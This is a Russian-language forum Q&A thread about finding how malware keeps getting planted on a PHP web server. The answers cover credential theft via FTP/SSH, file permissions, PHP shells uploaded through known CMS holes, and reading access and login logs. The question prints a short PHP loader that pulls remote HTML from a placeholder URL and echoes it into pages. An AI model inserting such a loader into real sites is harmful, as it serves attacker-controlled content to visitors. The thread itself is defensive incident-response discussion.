Заколебали подсаживать малварь на сервер. Как отловить точку входа?

Question

[Daniel Newman]

$url = "http://example.com/×××××/loader.html";
$code = @file_get_contents ($url);
echo $code;

Answer 1

[Пума Тайланд]

обычно фтп или ssh, вы пароли эти поменяли? если нет то меняйте.
Если где то дыра в коде, то тоже просто решается задача выставлением необходимых прав на файлы и директории, в php никто не сможет написать, а аплоуд нового файла легко отследить.

Comments

[Daniel Newman]

чудесным образом все права были скинуты в группу и пользователя апача. сейчас выставил в рута и 0755, но хочу найти дырку в чужом бородатом коде.

[Пума Тайланд]

А вы уверенны что это не фтп, фтп это 99 процентов подсаживания малваре, и первым надо его исключать.

[Daniel Newman]

Я фтп вообще «исключил»!) Были в свое время возможные проблемы с разрешением загружать что угодно (внешний компонент загрузчика), но удалось разрешить этот момент, запретив исполнение кода из директории загрузки. Плюс богатая история сохранения старых паролей для новых подрядчиков. Ну и WinSCP вроде не вызвал ни у кого отторжения. Так что не оно.

[Пума Тайланд]

Ну с winscp украсть пароль тоже не сложно, вы сменили все доступы? Вы проверили компьютеры всех кто имеет доступ на наличие вирусов каким нибудь касперским?

[Daniel Newman]

Тут больше вопрос в том, как отследить источник, уже внедренную куда-то программу, дающую возможность лазать и менять. Интерфейс управление зараженным сервером.

[Пума Тайланд]

Если украли ssh то смотрите last в момент когда появился вирус, там все ip с которых заходили.

Answer 2

[barker]

Сдаётся мне это всё через ftp/sh итд лезет в нормальном режиме с обычных клиентских машин. Это самый простой путь, очевидно.

Comments

[Daniel Newman]

А бэкдор на php, который не видим для maldet — чем не вариант? В свое время много их передушил, но отследить процесс внедрения — вот это интересней во много раз больше.

Answer 3

[Игорь Фаткулин]

По моему скромному опыту: это делают боты через уже известные дыры в джумла/пхпбб/етц, заливают пхпшелл и далее по тексту. Как правило, заражение происходит примерно в то же время, что и заливка шелла, и шелл не удаляется. Поэтому надо посмотреть время редактирования/создания сомнительных файлов, посмотреть в логах вебсервера в этот период обращения к необычным урлам и поискать там искомый шелл. После нахождения шелла посмотреть время его создания и смотреть логи на предмет обращения точно в это время к вебсерверу, дабы найти какой именно урл запрашивали, чтобы активировать дыру и загрузить через нее шелл.

Ну как один из вариантов.

Answer 4

[lubezniy]

Читайте логи, они рулез. И не только Web-сервера. Мне однажды в /var/log/messages (если мне память не изменяет) попались сообщения от wget, который запускали для заливки файла. По времени потом прошерстил access.log и нашёл URI скрипта, в который заранее подставили бяку.

Comments

[Daniel Newman]

память изменяет. это системные логи. ядро там, файловая система. wget — консольная команда. это тогда логи баша смотреть надо, на сколько я понимаю. и это слишком высокие привелегии, т.е. маловероятно весьма.